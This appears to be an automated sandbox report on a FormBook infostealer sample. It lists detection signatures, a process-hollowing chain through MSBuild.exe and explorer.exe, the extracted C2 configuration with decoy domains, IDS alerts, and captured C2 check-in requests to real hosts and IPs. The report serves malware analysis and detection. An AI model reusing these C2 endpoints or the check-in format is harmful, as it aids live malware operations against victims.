Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
Analysis ID:810265
MD5:19a7c2a3f614a2f0c25065ed749eff53
SHA1:fba7bde153caa8329cff3e906ea903402e51bc88
SHA256:f8aa17381586d95eb4511d81932e4b53ddf5d3f17f8dc979f509ab94fe7cee64
Tags:exe, Formbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe (PID: 1092 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe MD5: 19A7C2A3F614A2F0C25065ED749EFF53)
    • MSBuild.exe (PID: 5884 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 2852 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
    • MSBuild.exe (PID: 2808 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: D621FD77BD585874F9686D3A76462EF1)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmmon32.exe (PID: 5908 cmdline: C:\Windows\SysWOW64\cmmon32.exe MD5: 2879B30A164B9F7671B5E6B2E9F8DFDA)
          • cmd.exe (PID: 5140 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.fliparcher.store/p25s/"], "decoy": ["krautdialer.com", "jasmine-baba.com", "jdyokum.com", "lingeriepourdames.com", "freefontforest.com", "32612.xyz", "katkisiz.info", "blueskyinteractives.co.uk", "ieruiw.top", "nurfedui.net", "allsttk.com", "tanglwood.net", "gyrationtechs.africa", "tpsplant.africa", "kp-morioka-minami.com", "aiindianapolis.com", "axesslimousine.com", "shopvougs.com", "couldskuathink.com", "aformulaonline.com", "thescopolaminequeen.com", "haberturi.com", "childsqianage.com", "6n1000.com", "iqd964.com", "svtechsoln.com", "havensedgemc.net", "obqj58.net", "desipizza.uk", "artfulprintz.com", "blackhillsbrandingcompany.com", "je-suisla.biz", "pfokn.online", "16235.vip", "definedrealtygroup.com", "kaktyc.ru", "dobrozdrawin3.ru", "iftar.rsvp", "thaichildrenstrust.org.uk", "hastelaundry.com", "anbietertest.com", "furniture-99732.com", "hairbybea.co.uk", "tjhymzz.com", "cyclorga.com", "appatit.com", "afemebel.ru", "hblcfl.com", "envivox.com", "singlesnearyou.co.uk", "asterasweden.com", "singer-dj.co.uk", "itselizabethsmktgmethod.com", "vacacioneschile.net", "associazionefaber.com", "hostim.dev", "dragon-mail.biz", "nonfungible.africa", "cmcl.africa", "vsattorney.africa", "angiesminishop24gmail.com", "wecareer.net", "mojk.net", "adamdavisgroup.com"]}
Source | Rule | Description | Author | Strings
00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
    00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      Source | Rule | Description | Author | Strings
      3.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        3.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.2.MSBuild.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          3.2.MSBuild.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          3.2.MSBuild.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          No Sigma rule has matched
          Timestamp:02/16/23-23:50:26.920788
          Source IP:192.168.2.5
          Destination IP:160.121.126.44
          SID:2031453
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/16/23-23:50:01.373956
          Source IP:192.168.2.5
          Destination IP:213.171.195.105
          SID:2031449
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/16/23-23:50:26.920788
          Source IP:192.168.2.5
          Destination IP:160.121.126.44
          SID:2031412
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/16/23-23:50:01.373956
          Source IP:192.168.2.5
          Destination IP:213.171.195.105
          SID:2031412
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/16/23-23:50:01.373956
          Source IP:192.168.2.5
          Destination IP:213.171.195.105
          SID:2031453
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:02/16/23-23:50:26.920788
          Source IP:192.168.2.5
          Destination IP:160.121.126.44
          SID:2031449
          Source Port:49713
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          AV Detection

          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, ReversingLabs: Detection: 15%
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, Virustotal: Detection: 36%
          Source: Yara match, File source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, Joe Sandbox ML: detected
          Source: 3.2.MSBuild.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: FormBook
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: MSBuild.exe, 00000003.00000002.379397071.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MSBuild.exe, 00000003.00000002.379397071.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000003.00000003.329387345.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.331569732.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.379956956.0000000004AC0000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.375918815.000000000492E000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004D7F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000003.00000003.329387345.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.331569732.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.379956956.0000000004AC0000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.375918815.000000000492E000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004D7F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 4x nop then pop ebx, 3_2_00407B1B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Code function: 4x nop then pop esi, 3_2_00417322

          Networking

          Source: C:\Windows\explorer.exe, Network Connect: 156.242.168.70 80
          Source: C:\Windows\explorer.exe, Domain query: www.desipizza.uk
          Source: C:\Windows\explorer.exe, Domain query: www.hblcfl.com
          Source: C:\Windows\explorer.exe, Domain query: www.anbietertest.com
          Source: C:\Windows\explorer.exe, Network Connect: 45.195.140.44 80
          Source: C:\Windows\explorer.exe, Network Connect: 213.171.195.105 80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49711 -> 213.171.195.105:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49711 -> 213.171.195.105:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49711 -> 213.171.195.105:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 160.121.126.44:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 160.121.126.44:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49713 -> 160.121.126.44:80
          Source: Malware configuration extractor, URLs: www.fliparcher.store/p25s/
          Source: Joe Sandbox View, ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
          Source: global traffic, HTTP traffic detected: GET /p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN4 HTTP/1.1; Host: www.anbietertest.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN4 HTTP/1.1; Host: www.hblcfl.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN4 HTTP/1.1; Host: www.desipizza.uk; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN4 HTTP/1.1; Host: www.couldskuathink.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
          Source: Joe Sandbox View, IP Address: 213.171.195.105 213.171.195.105
          Source: unknown, Network traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 49679 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 49701 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 49687 -> 443
          Source: unknown, Network traffic detected: HTTP traffic on port 49680 -> 443
          Source: global traffic, HTTP traffic detected: HTTP/1.1 503 Service Unavailable; Server: nginx/1.14.2; Date: Thu, 16 Feb 2023 22:49:21 GMT; Content-Type: text/html; Transfer-Encoding: chunked; Connection: close; Data Raw: 31 33 0d 0a 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 0d 0a 30 0d 0a 0d 0a; Data Ascii: 13Service Unavailable0
          Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Thu, 16 Feb 2023 22:47:33 GMT; Content-Type: text/html; Content-Length: 466; Connection: close
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.associazionefaber.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.associazionefaber.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.associazionefaber.com/p25s/www.fliparcher.store
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.associazionefaber.comReferer:
          Source: explorer.exe, 00000004.00000000.360740274.000000000ED27000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.568119582.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.339990008.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blueskyinteractives.co.uk
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blueskyinteractives.co.uk/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blueskyinteractives.co.uk/p25s/www.adamdavisgroup.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.blueskyinteractives.co.ukReferer:
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.couldskuathink.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.couldskuathink.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.couldskuathink.com/p25s/www.tjhymzz.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.couldskuathink.comReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.desipizza.uk
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.desipizza.uk/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.desipizza.uk/p25s/www.couldskuathink.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.desipizza.ukReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fliparcher.store
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fliparcher.store/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fliparcher.store/p25s/www.pfokn.online
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.fliparcher.storeReferer:
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
